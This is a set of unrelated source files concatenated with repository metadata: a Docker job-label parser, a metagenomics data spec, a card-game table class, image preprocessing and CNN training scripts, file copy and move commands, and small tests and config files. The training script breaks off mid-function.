from functools import lru_cache from collections import defaultdict import logging from typing import DefaultDict, Dict, Optional, Tuple, Type, Union # noqa: F401 from apscheduler.triggers.cron import CronTrigger # type: ignore from apscheduler.triggers.date import DateTrigger # type: ignore from apscheduler.triggers.interval import IntervalTrigger # type: ignore import cerberus # type: ignore from pytz import all_timezones from deck_chores.config import cfg from deck_chores.exceptions import ParsingError from deck_chores.utils import generate_id, split_string #### Trigger = Union[CronTrigger, DateTrigger, IntervalTrigger] #### NAME_INTERVAL_MAP = { 'weekly': (1, 0, 0, 0, 0), 'daily': (0, 1, 0, 0, 0), 'hourly': (0, 0, 1, 0, 0), 'every minute': (0, 0, 0, 1, 0), 'every second': (0, 0, 0, 0, 1), } #### log = logging.getLogger('deck_chores') #### class JobConfigValidator(cerberus.Validator): @staticmethod @lru_cache(128) def _fill_args(value: str, length: int, filling: str) -> Tuple[str, ...]: value = value.strip() while ' ' in value: value = value.replace(' ', ' ') tokens = value.split(' ') return tuple([filling] * (length - len(tokens)) + tokens) def _normalize_coerce_cron(self, value: str) -> Tuple[Type, Tuple[str, ...]]: # TODO there's a constant here args = self._fill_args(value, len(CronTrigger.FIELD_NAMES), '*') return CronTrigger, args def _normalize_coerce_date(self, value: str) -> Tuple[Type, Tuple[str]]: return DateTrigger, (value,) def _normalize_coerce_interval( self, value: str ) -> Tuple[Type, Optional[Tuple[int, int, int, int, int]]]: args = NAME_INTERVAL_MAP.get(value) if args is None: for c in '.:/': value = value.replace(c, ' ') args = self._fill_args(value, 5, '0') # type: ignore args = tuple(int(x) for x in args) # type: ignore return IntervalTrigger, args def _validator_trigger(self, field, value): if isinstance(value, str): # normalization failed return trigger_class, args = value[0], value[1] try: trigger_class(*args, timezone=self.document.get('timezone', cfg.timezone)) except Exception as e: message = "Error while instantiating a {trigger} with '{args}'.".format( trigger=trigger_class.__name__, args=args ) if cfg.debug: message += "\n%s" % e self._error(field, message) job_def_validator = JobConfigValidator( { 'command': {'required': True}, 'cron': { 'coerce': 'cron', 'validator': 'trigger', 'required': True, 'excludes': ['date', 'interval'], }, 'date': { 'coerce': 'date', 'validator': 'trigger', 'required': True, 'excludes': ['cron', 'interval'], }, 'interval': { 'coerce': 'interval', 'validator': 'trigger', 'required': True, 'excludes': ['cron', 'date'], }, 'max': {'coerce': int, 'default_setter': lambda x: cfg.default_max}, 'name': {'regex': r'[a-z0-9.-]+'}, 'timezone': { 'default_setter': lambda x: cfg.timezone, 'allowed': all_timezones, 'required': True, }, 'user': {'default_setter': lambda x: cfg.default_user}, } ) #### def labels(*args, **kwargs) -> Tuple[str, str, dict]: # don't call this from unittests try: return _parse_labels(*args, **kwargs) except ParsingError as e: if isinstance(e.args[0], str): lines = e.args[0].splitlines() elif isinstance(e.args[0], list): lines = e.args[0] else: raise RuntimeError for line in lines: if isinstance(line, str): log.error(line) elif isinstance(line, Exception): log.exception(line) return '', '', {} except Exception as e: raise e @lru_cache() def _parse_labels(container_id: str) -> Tuple[str, str, dict]: _labels = cfg.client.containers.get(container_id).labels log.debug('Parsing labels: %s' % _labels) filtered_labels = {k: v for k, v in _labels.items() if k.startswith(cfg.label_ns)} options = _parse_options(_labels.get(cfg.label_ns + 'options', None)) service_id = _parse_service_id(_labels) if 'image' in options: _labels = _image_definition_labels_of_container(container_id).copy() _labels.update(filtered_labels) else: _labels = filtered_labels job_definitions = _parse_job_defintion(_labels) if service_id: log.debug('Assigning service id: %s' % service_id) for definition in job_definitions.values(): # this is informative, not functional definition['service_id'] = service_id return service_id, options, job_definitions @lru_cache(4) def _parse_options(options: str) -> str: result = set(cfg.default_options) if options is not None: for option in split_string(options): if option.startswith('no'): result.remove(option[2:]) else: result.add(option) result_string = ','.join(sorted(x for x in result if x)) log.debug('Parsed options: %s' % result_string) return result_string def _parse_service_id(_labels: dict) -> str: filtered_labels = {k: v for k, v in _labels.items() if k in cfg.service_identifiers} log.debug('Considering labels for service id: %s' % filtered_labels) if not filtered_labels: return '' if len(filtered_labels) != len(cfg.service_identifiers): log.critical( 'Missing service identity labels: {}'.format( ', '.join(set(cfg.service_identifiers) - set(filtered_labels)) ) ) return '' identifiers = tuple(filtered_labels[x] for x in cfg.service_identifiers) return generate_id(*identifiers) @lru_cache() def _image_definition_labels_of_container(container_id: str) -> Dict[str, str]: labels = cfg.client.containers.get(container_id).image.labels return {k: v for k, v in labels.items() if k.startswith(cfg.label_ns)} def _parse_job_defintion(_labels: dict) -> dict: log.debug('Considering labels for job definitions: %s' % _labels) name_grouped_definitions = defaultdict( dict ) # type: DefaultDict[str, Dict[str, str]] for key, value in _labels.items(): if key == cfg.label_ns + 'options': continue name, attribute = key[len(cfg.label_ns):].rsplit('.', 1) name_grouped_definitions[name][attribute] = value log.debug('Definitions: %s' % name_grouped_definitions) result = {} for name, definition in name_grouped_definitions.items(): log.debug('Processing %s' % name) definition['name'] = name if not job_def_validator(definition): log.error('Misconfigured job definition: %s' % definition) log.error('Errors: %s' % job_def_validator.errors) else: job = job_def_validator.document for trigger_name in ('cron', 'date', 'interval'): trigger = job.pop(trigger_name, None) if trigger is None: continue job['trigger'] = trigger log.debug('Normalized definition: %s' % job) result[name] = job return result #### __all__ = [labels.__name__]
5223dd247001b502827063554b4efad3205d446e
2b42b40ae2e84b438146003bf231532973f1081d
/spec/mgm4441501.3.spec
e67e344e2f6159571cddc2df4d0a27d1a2583ac7
[]
no_license
MG-RAST/mtf
0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a
e2ddb3b145068f22808ef43e2bbbbaeec7abccff
refs/heads/master
2020-05-20T15:32:04.334532
2012-03-05T09:51:49
2012-03-05T09:51:49
3,625,755
0
1
null
null
null
null
UTF-8
Python
false
false
13,964
spec
{ "id": "mgm4441501.3", "metadata": { "mgm4441501.3.metadata.json": { "format": "json", "provider": "metagenomics.anl.gov" } }, "providers": { "metagenomics.anl.gov": { "files": { "100.preprocess.info": { "compression": null, "description": null, "size": 736, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/100.preprocess.info" }, "100.preprocess.passed.fna.gz": { "compression": "gzip", "description": null, "size": 99268, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/100.preprocess.passed.fna.gz" }, "100.preprocess.passed.fna.stats": { "compression": null, "description": null, "size": 306, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/100.preprocess.passed.fna.stats" }, "100.preprocess.removed.fna.gz": { "compression": "gzip", "description": null, "size": 11981, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/100.preprocess.removed.fna.gz" }, "100.preprocess.removed.fna.stats": { "compression": null, "description": null, "size": 304, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/100.preprocess.removed.fna.stats" }, "205.screen.h_sapiens_asm.info": { "compression": null, "description": null, "size": 451, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/205.screen.h_sapiens_asm.info" }, "299.screen.info": { "compression": null, "description": null, "size": 410, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/299.screen.info" }, "299.screen.passed.fna.gcs": { "compression": null, "description": null, "size": 1538, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/299.screen.passed.fna.gcs" }, "299.screen.passed.fna.gz": { "compression": "gzip", "description": null, "size": 100017, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/299.screen.passed.fna.gz" }, "299.screen.passed.fna.lens": { "compression": null, "description": null, "size": 123, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/299.screen.passed.fna.lens" }, "299.screen.passed.fna.stats": { "compression": null, "description": null, "size": 306, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/299.screen.passed.fna.stats" }, "440.cluster.rna97.fna.gz": { "compression": "gzip", "description": null, "size": 18311, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/440.cluster.rna97.fna.gz" }, "440.cluster.rna97.fna.stats": { "compression": null, "description": null, "size": 304, "type": "fasta", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/440.cluster.rna97.fna.stats" }, "440.cluster.rna97.info": { "compression": null, "description": null, "size": 947, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/440.cluster.rna97.info" }, "440.cluster.rna97.mapping": { "compression": null, "description": null, "size": 608028, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/440.cluster.rna97.mapping" }, "440.cluster.rna97.mapping.stats": { "compression": null, "description": null, "size": 49, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/440.cluster.rna97.mapping.stats" }, "450.rna.expand.rna.gz": { "compression": "gzip", "description": null, "size": 12619, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/450.rna.expand.rna.gz" }, "450.rna.sims.filter.gz": { "compression": "gzip", "description": null, "size": 176834, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/450.rna.sims.filter.gz" }, "450.rna.sims.gz": { "compression": "gzip", "description": null, "size": 7233374, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/450.rna.sims.gz" }, "900.abundance.function.gz": { "compression": "gzip", "description": null, "size": 1724, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.abundance.function.gz" }, "900.abundance.lca.gz": { "compression": "gzip", "description": null, "size": 38, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.abundance.lca.gz" }, "900.abundance.md5.gz": { "compression": "gzip", "description": null, "size": 2114, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.abundance.md5.gz" }, "900.abundance.ontology.gz": { "compression": "gzip", "description": null, "size": 43, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.abundance.ontology.gz" }, "900.abundance.organism.gz": { "compression": "gzip", "description": null, "size": 3028, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.abundance.organism.gz" }, "900.loadDB.sims.filter.seq": { "compression": null, "description": null, "size": 2044327, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.loadDB.sims.filter.seq" }, "900.loadDB.source.stats": { "compression": null, "description": null, "size": 91, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/900.loadDB.source.stats" }, "999.done.COG.stats": { "compression": null, "description": null, "size": 1, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.COG.stats" }, "999.done.KO.stats": { "compression": null, "description": null, "size": 1, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.KO.stats" }, "999.done.NOG.stats": { "compression": null, "description": null, "size": 1, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.NOG.stats" }, "999.done.Subsystems.stats": { "compression": null, "description": null, "size": 1, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.Subsystems.stats" }, "999.done.class.stats": { "compression": null, "description": null, "size": 349, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.class.stats" }, "999.done.domain.stats": { "compression": null, "description": null, "size": 26, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.domain.stats" }, "999.done.family.stats": { "compression": null, "description": null, "size": 572, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.family.stats" }, "999.done.genus.stats": { "compression": null, "description": null, "size": 542, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.genus.stats" }, "999.done.order.stats": { "compression": null, "description": null, "size": 473, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.order.stats" }, "999.done.phylum.stats": { "compression": null, "description": null, "size": 207, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.phylum.stats" }, "999.done.rarefaction.stats": { "compression": null, "description": null, "size": 23714, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.rarefaction.stats" }, "999.done.sims.stats": { "compression": null, "description": null, "size": 81, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.sims.stats" }, "999.done.species.stats": { "compression": null, "description": null, "size": 949, "type": "txt", "url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4441501.3/file/999.done.species.stats" } }, "id": "mgm4441501.3", "provider": "metagenomics.anl.gov", "providerId": "mgm4441501.3" } }, "raw": { "mgm4441501.3.fna.gz": { "compression": "gzip", "format": "fasta", "provider": "metagenomics.anl.gov", "url": "http://api.metagenomics.anl.gov/reads/mgm4441501.3" } } }
4b8cc3d566e7d58bc9404bd86ae945be8cf6d1cd
5f1c96bd362e5344210aa828e92f33f3382974bd
/src/core/table.py
03410095bd7a8d5de9080f36584cf484967d9160
[]
no_license
huagor/doudizhu-3
d7fc8408b068a86179ce96f35a85ad1733ab4b7c
ca3ba87f7b0d2553a47584e03c499b191f471563
refs/heads/master
2021-06-20T11:02:40.254917
2017-07-05T15:39:04
2017-07-05T15:39:04
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,977
py
import logging import random from typing import List from tornado.ioloop import IOLoop from core.robot import AiPlayer from net.protocol import Protocol as Pt logger = logging.getLogger('ddz') class Table(object): WAITING = 0 PLAYING = 1 END = 2 CLOSED = 3 def __init__(self): self.uid = Table.gen_id() self.players = [None, None, None] self.state = 0 # 0 waiting 1 playing 2 end 3 closed self.pokers: List[int] = [] self.multiple = 1 self.call_score = 0 self.whose_turn = 0 self.last_shot_seat = 0 self.last_shot_poker = [] self.room = 100 IOLoop.current().call_later(0.1, self.ai_join, nth=1) def ai_join(self, nth=1): size = self.size() if size == 0 or size == 3: return if size == 2 and nth == 1: IOLoop.current().call_later(1, self.ai_join, nth=2) p1 = AiPlayer(11, 'AI-1', self.players[0]) p1.to_server([Pt.REQ_JOIN_TABLE, self.uid]) if size == 1: p2 = AiPlayer(12, 'AI-2', self.players[0]) p2.to_server([Pt.REQ_JOIN_TABLE, self.uid]) def sync_table(self): ps = [] for p in self.players: if p: ps.append((p.uid, p.name)) else: ps.append((-1, '')) response = [Pt.RSP_JOIN_TABLE, self.uid, ps] for player in self.players: if player: player.send(response) def deal_poker(self): # if not all(p and p.ready for p in self.players): # return self.state = 1 self.pokers = [i for i in range(54)] random.shuffle(self.pokers) for i in range(51): self.players[i % 3].hand_pokers.append(self.pokers.pop()) self.whose_turn = random.randint(0, 2) for p in self.players: p.hand_pokers.sort() response = [Pt.RSP_DEAL_POKER, self.turn_player.uid, p.hand_pokers] p.send(response) def call_score_end(self, score): self.call_score = score self.turn_player.role = 2 self.turn_player.hand_pokers += self.pokers response = [Pt.RSP_SHOW_POKER, self.turn_player.uid, self.pokers] for p in self.players: p.send(response) logger.info('Player[%d] IS LANDLORD[%s]', self.turn_player.uid, str(self.pokers)) def go_next_turn(self): self.whose_turn += 1 if self.whose_turn == 3: self.whose_turn = 0 @property def turn_player(self): return self.players[self.whose_turn] def calc_coin(self, winner): self.state = 2 coins = [] tax = 100 for p in self.players: p.ready = False coin = self.room * self.call_score * self.multiple if p == winner: coins.append(coin - tax) else: coins.append(-coin - tax) return coins def add(self, player): for i, p in enumerate(self.players): if not p: player.seat = i self.players[i] = player return True logger.error('Player[%d] JOIN Table[%d] FULL', player.pid, self.uid) return False def remove(self, player): for i, p in enumerate(self.players): if p and p.pid == player.pid: self.players[i] = None else: logger.error('Player[%d] NOT IN Table[%d]', player.pid, self.uid) if all(p is None for p in self.players): self.state = 3 logger.error('Table[%d] close', self.uid) return True return False def size(self): return sum([p is not None for p in self.players]) def __str__(self): return '[{}: {}]'.format(self.uid, self.players) counter = 0 @classmethod def gen_id(cls): cls.counter += 1 return cls.counter
c45ce4f83dd33f28f821f06e41f9651f9bd68f9c
daedd7d771bcb3179b9c9bada700a15f20bdad66
/preprocess.py
0d0efa59213f1e187d5364cf7b31b3633440d948
[]
no_license
BenaichaA/MURA-Deep-Learning-Project
ba15ceb8417fbe9d992672e76400354853844bdd
a188c5c88943bc1b25032f1c9f9752450e7bf006
refs/heads/master
2020-05-14T13:36:45.450858
2019-05-01T20:46:29
2019-05-01T20:46:29
181,816,148
1
0
null
null
null
null
UTF-8
Python
false
false
1,906
py
import csv import numpy as np import tensorflow as tf def format_labels(): paths = "MURA-v1.1/valid_image_paths.csv" labels = "MURA-v1.1/valid_labeled_studies.csv" filePaths = [] with open(paths) as pathsfile: readPaths = csv.reader(pathsfile, delimiter=',') for row in readPaths: filePaths.append(row[0]) filePaths = np.array(filePaths) fileLabels = np.zeros(filePaths.size) with open(labels) as labelsfile: readLabels = csv.reader(labelsfile, delimiter=',') for row in readLabels: fileLabels[np.flatnonzero(np.core.defchararray.find(filePaths, row[0])!=-1)] = row[1] np.save("valid_labels_array.npy", fileLabels) np.save("valid_paths_array.npy", filePaths) def format_studies(): labels = "MURA-v1.1/valid_labeled_studies.csv" filePaths = [] with open(labels) as pathsfile: readPaths = csv.reader(pathsfile, delimiter=',') for row in readPaths: filePaths.append([row[0], int(row[1])]) np.save("valid_studies_array.npy", filePaths) def parse_and_augment(filename, label, row, col): image = tf.read_file(filename) image = tf.image.decode_png(image, channels=1) image = tf.cast(tf.image.resize_image_with_pad(image, row, col), tf.float32) image = tf.contrib.image.rotate(image, angles=tf.random.uniform([1], minval=-0.3, maxval=0.3)[0], interpolation='BILINEAR') image = tf.image.random_flip_left_right(image) image = tf.image.grayscale_to_rgb(image) return image, label def parse_file(filename, label, row, col): image = tf.read_file(filename) image = tf.image.decode_png(image, channels=1) image = tf.cast(tf.image.resize_image_with_pad(image, row, col), tf.float32) image = tf.image.grayscale_to_rgb(image) return image, label def shuffle(a, b): p = np.random.permutation(len(a)) return a[p], b[p]
ef70822fe7bc5e5ed1a9943009eca03accec250d
485f4cd1643b38dcdca46510a32f333b31742b61
/src/simple-potentiometer.py
64cc615a673357c493fb2efcf546663807e26694
[ "Apache-2.0" ]
permissive
athenian-programming/cpx-crickit-tutorial
c3b66ab27295ab53b5882955d2fccf4afc9963d6
0c7c6b82e44e4389fcee0977e064e651c7cb3678
refs/heads/master
2020-04-09T01:18:48.578300
2018-12-02T18:58:19
2018-12-02T18:58:19
159,899,405
0
0
null
null
null
null
UTF-8
Python
false
false
232
py
import time import board from analogio import AnalogIn # A2 is used here, but A1 and A3 are also candidates analogin = AnalogIn(board.A2) while True: voltage = analogin.value / 65536 print((voltage,)) time.sleep(0.1)
396232a34fba1ca17fea228d8ca0ede2baf546f0
81549b7fb2464574c275cc4c6f71e42c3018be4e
/packager/file.py
339a541d69dd4851413fcd84098d185d845dddd3
[]
no_license
jeffbowman/packager
e4a499ef6d3b2db74ff213c9db4f685a88867588
60bea84b916a0c83fce8087ff72d12a508c283d0
refs/heads/master
2021-01-10T09:02:21.147680
2016-04-05T15:38:22
2016-04-05T15:38:22
55,028,691
0
0
null
null
null
null
UTF-8
Python
false
false
3,285
py
from abc import ABCMeta, abstractmethod from command import Command import shutil import os import logging class File(Command): """Base class for commands to handle file operations. Should not be instantiated, rather use `Move` or `Copy` commands. """ __metaclass__ = ABCMeta def __init__(self, opts): if not opts.has_key('source'): raise Exception('source tag must be provided in ', opts) else: self.source = opts['source']['name'] if not opts.has_key('target'): raise Exception('target tag must be provided in ', opts) else: self.target = opts['target']['name'] if opts['source'].has_key('contents'): self.src_contents = opts['source']['contents'] if not type(self.src_contents) == list: raise Exception('source contents must be a list in ', opts) else: self.src_contents = None @abstractmethod def do(self): pass class Move(File): """Command to move files or directories. Will recursively move a file or directory to a target location. Required: source target Optional: contents yaml example: --- - move: source: name: String contents: [list of String] target: name: String """ def __init__(self, opts): super(Move, self).__init__(opts) if opts.has_key('execute'): self.execute = opts['execute'] else: self.execute = None def do(self): if self.execute != None: super(Move, self).do() return src = os.path.abspath(self.source) target = os.path.abspath(self.target) if not os.path.exists(target): print('making target: ' + target) os.makedirs(target) if self.src_contents != None: files = self.src_contents else: files = os.listdir(src) for f in [src + '/' + f for f in files]: logging.info('move ' + f + ' -> ' + target) shutil.move(f, target) class Copy(File): """Command to copy files or directories. Will recursively copy a file or directory to a target location. Required: source target Optional: contents yaml example: --- - move: source: name: String contents: [list of String] target: name: String """ def __init__(self, opts): super(Copy, self).__init__(opts) if opts.has_key('execute'): self.execute = opts['execute'] else: self.execute = None def do(self): if self.execute != None: super(File, self).do() src = os.path.abspath(self.source) target = os.path.abspath(self.target) if not os.path.exists(target): os.makedirs(target) if self.src_contents != None: files = [src + '/' + f for f in self.src_contents] else: files = [src + '/' + f for f in os.listdir(src)] for f in files: logging.info('copy ' + f + ' -> ' + target) shutil.copy(f, target)
b551f6a67c562c1ba60365cb11afee1bb21d6d0e
f902bfafd93fe96515f5b12fa8630b365cf71ce9
/tests/events/test_group.py
c0a25f25ff814c12d580094ebf7f0a857a69ae97
[]
no_license
hickb/Houdini-Toolbox
69e999a924f387313382c254de2771d66c649f64
5309b2608f86b12aab8e90e754269ed2d2a44653
refs/heads/master
2022-06-18T23:08:45.481414
2020-05-06T19:25:02
2020-05-06T19:25:02
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,481
py
"""Tests for ht.events.group module.""" # ============================================================================= # IMPORTS # ============================================================================= # Houdini Toolbox Imports import ht.events.group # ============================================================================= # TESTS # ============================================================================= class Test_HoudiniEventGroup(object): """Test ht.events.group.HoudiniEventGroup class.""" def test___init__(self): """Test object initialization.""" group = ht.events.group.HoudiniEventGroup() assert group._data == {} assert group._event_map == {} # Properties def test_data(self, mocker): """Test the 'data' property.""" mocker.patch.object( ht.events.group.HoudiniEventGroup, "__init__", lambda x: None ) group = ht.events.group.HoudiniEventGroup() mock_value = mocker.MagicMock(spec=dict) group._data = mock_value assert group.data == mock_value def test_event_map(self, mocker): """Test 'event_map' property.""" mocker.patch.object( ht.events.group.HoudiniEventGroup, "__init__", lambda x: None ) group = ht.events.group.HoudiniEventGroup() mock_value = mocker.MagicMock(spec=dict) group._event_map = mock_value assert group.event_map == mock_value
2d0dc2c09a870c30cd508203de167546dc1deb35
aff27667091f8f9217784d1918722caeb2ec124c
/runp-heroku.py
ee2fc08e61973a8d081df9faf97c92ed730f96a2
[]
no_license
PritishC/flask-microblog
2353d74ba3268c1ec6aa4ee1e314b359d347d361
00f87d4112a63f0eedb14293c34363c93e90078d
refs/heads/master
2016-09-05T20:26:48.161299
2014-09-02T07:11:42
2014-09-02T07:11:42
22,011,745
1
0
null
null
null
null
UTF-8
Python
false
false
62
py
#!/home/pritishc/Envs/ircflask/bin/python from app import app
8093a2ae2e4f724c10c39558d775be3dd8e508b5
ac5e52a3fc52dde58d208746cddabef2e378119e
/exps-gsn-edf/gsn-edf_ut=3.5_rd=1_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py
a11fb9d9a8e363d961dbdb7bb6a5f953e71cec31
[]
no_license
ricardobtxr/experiment-scripts
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
7bcebff7ac2f2822423f211f1162cd017a18babb
refs/heads/master
2023-04-09T02:37:41.466794
2021-04-25T03:27:16
2021-04-25T03:27:16
358,926,457
0
0
null
null
null
null
UTF-8
Python
false
false
503
py
-X FMLP -Q 0 -L 1 66 250 -X FMLP -Q 0 -L 1 57 200 -X FMLP -Q 0 -L 1 57 400 -X FMLP -Q 0 -L 1 53 250 -X FMLP -Q 0 -L 1 45 200 -X FMLP -Q 1 -L 1 42 150 -X FMLP -Q 1 -L 1 40 125 -X FMLP -Q 1 -L 1 34 125 -X FMLP -Q 1 -L 1 32 150 -X FMLP -Q 1 -L 1 31 150 -X FMLP -Q 2 -L 1 29 100 -X FMLP -Q 2 -L 1 26 200 -X FMLP -Q 2 -L 1 20 250 -X FMLP -Q 2 -L 1 20 125 -X FMLP -Q 3 -L 1 16 125 -X FMLP -Q 3 -L 1 14 100 -X FMLP -Q 3 -L 1 13 125 -X FMLP -Q 3 -L 1 4 100
67600faad0af4b5d359fc64839e03d55c8fa8155
dce438aec547bb36a48c5f1667db20f6c877e4a6
/work.py
501af3eeafcbd13b6f7f2a248a92eadfa26b8b7c
[]
no_license
tuhin47/Signature-Recognition
139d9ce808dc1bb23ca68155010ebf625b6eb656
483f8e114c824b81a748c66edb585813000a1e7b
refs/heads/master
2020-03-07T13:56:55.717869
2018-03-31T08:40:32
2018-03-31T08:40:32
127,514,624
0
0
null
null
null
null
UTF-8
Python
false
false
6,349
py
import prepross import tensorflow as tf import os from numpy.random import seed seed(1) from tensorflow import set_random_seed set_random_seed(2) batch_size = 30 #classes = ['A','B','C', 'D', 'E', 'F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','W','X','Y','Z'] classes =["1","10","11","12","13","14","15", "16","17","18","19","2","3","4","5","6","7","8"] #,"ch001","ch002","ch003","ch004","ch005","ch006","ch007", #"ch008","ch009","ch010","dut001","dut002","dut003","dut004","dut006","dut009","dut012","dut014","dut015", #"dut016"] #"001","002","003","004","005","006","007","008","009","010","011","012", num_classes = len(classes) train_accuracy=[] validation_accuracy=[] validation_loss=[] epoc_list=[] validation_size = 0.2 img_size = 128 num_channels = 3 train_path='data/train' data = prepross.read_train_sets(train_path, img_size, classes, validation_size=validation_size) print("SUCCESSFULLY READED") print("===================") print("TRAINING:\t\t{}".format(len(data.train.labels))) print("VALIDATION:\t{}".format(len(data.valid.labels))) session = tf.Session() x = tf.placeholder(tf.float32, shape=[None, img_size,img_size,num_channels], name='x') print(x) y_true = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_true') y_true_cls = tf.argmax(y_true, dimension=1) filter_size_conv1 = 3 num_filters_conv1 = 32 filter_size_conv2 = 3 num_filters_conv2 = 32 filter_size_conv3 = 3 num_filters_conv3 = 64 # # filter_size_conv4 = 3 # num_filters_conv4 = 64 fc_layer_size = 128 def create_weights(shape): return tf.Variable(tf.truncated_normal(shape, stddev=0.05)) def create_biases(size): return tf.Variable(tf.constant(0.05, shape=[size])) def create_convolutional_layer(input, num_input_channels, conv_filter_size, num_filters): weights = create_weights(shape=[conv_filter_size, conv_filter_size, num_input_channels, num_filters]) biases = create_biases(num_filters) layer = tf.nn.conv2d(input=input, filter=weights, strides=[1, 1, 1, 1], padding='SAME') layer += biases layer = tf.nn.max_pool(value=layer, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') layer = tf.nn.relu(layer) return layer def create_flatten_layer(layer): layer_shape = layer.get_shape() num_features = layer_shape[1:4].num_elements() layer = tf.reshape(layer, [-1, num_features]) return layer def create_fc_layer(input, num_inputs, num_outputs, use_relu=True): weights = create_weights(shape=[num_inputs, num_outputs]) biases = create_biases(num_outputs) # Fully connected layer layer = tf.matmul(input, weights) + biases layer = tf.nn.sigmoid(layer) # if use_relu: # layer = tf.nn.relu(layer) # # elif use_sigmoid: # layer = tf.nn.sigmoid(layer) return layer layer_conv1 = create_convolutional_layer(input=x, num_input_channels=num_channels, conv_filter_size=filter_size_conv1, num_filters=num_filters_conv1) layer_conv2 = create_convolutional_layer(input=layer_conv1, num_input_channels=num_filters_conv1, conv_filter_size=filter_size_conv2, num_filters=num_filters_conv2) # layer_conv3= create_convolutional_layer(input=layer_conv2, # num_input_channels=num_filters_conv2, # conv_filter_size=filter_size_conv3, # num_filters=num_filters_conv3) # layer_conv4= create_convolutional_layer(input=layer_conv3, # num_input_channels=num_filters_conv3, # conv_filter_size=filter_size_conv4, # num_filters=num_filters_conv4) layer_flat = create_flatten_layer(layer_conv2) layer_fc1 = create_fc_layer(input=layer_flat, num_inputs=layer_flat.get_shape()[1:4].num_elements(), num_outputs=fc_layer_size ) layer_fc2 = create_fc_layer(input=layer_fc1, num_inputs=fc_layer_size, num_outputs=num_classes ) y_pred = tf.nn.softmax(layer_fc2,name='y_pred') y_pred_cls = tf.argmax(y_pred, dimension=1) session.run(tf.global_variables_initializer()) cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=layer_fc2, labels=y_true) cost = tf.reduce_mean(cross_entropy) optimizer = tf.train.AdamOptimizer(learning_rate=1e-3).minimize(cost) correct_prediction = tf.equal(y_pred_cls, y_true_cls) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) session.run(tf.global_variables_initializer()) def show_progress(epoch, feed_dict_train, feed_dict_validate, val_loss): acc = session.run(accuracy, feed_dict=feed_dict_train) val_acc = session.run(accuracy, feed_dict=feed_dict_validate) msg = " EPOCH {0} === TRAIN Accuracy: {1:>6.1%}, Validation Accuracy: {2:>6.1%}, Validation-Loss: {3:.3f}" print (msg.format (epoch + 1, acc, val_acc, val_loss) ) total_iterations = 0 saver = tf.train.Saver() def train(num_iteration): global total_iterations print ('PATH: ' +os.getcwd()) for i in range(total_iterations, total_iterations + num_iteration): x_batch, y_true_batch, _, cls_batch = data.train.next_batch(batch_size) x_valid_batch, y_valid_batch, _, valid_cls_batch = data.valid.next_batch(batch_size) feed_dict_tr = {x: x_batch, y_true: y_true_batch} 